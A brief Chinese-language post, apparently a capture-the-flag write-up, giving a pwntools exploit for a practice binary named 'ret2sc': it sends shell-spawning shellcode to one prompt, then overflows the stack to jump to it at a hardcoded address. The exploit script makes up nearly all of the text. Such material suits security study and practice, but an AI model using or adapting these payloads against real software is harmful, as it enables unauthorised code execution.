栈溢出,执行shellcode
exp:
from pwn import *
context.log_level="debug"
p = process('./ret2sc')
elf = ELF('./ret2sc')
#stackoverflow execve the syscall
read_plt = elf.symbols['read']
bss = elf.bss()
log.info("-----------send shellcode----------------")
payload1 = asm(shellcraft.sh())
p.recvuntil("Name:")
p.sendline(payload1)
log.info("-----------return shellcode-----------------")
pause()
payload2 = 'a'*0x1c + 'bbbb' + p32(0x0804a060)
p.recvuntil("Try your best:")
p.send(payload2)
p.interactive()
网友评论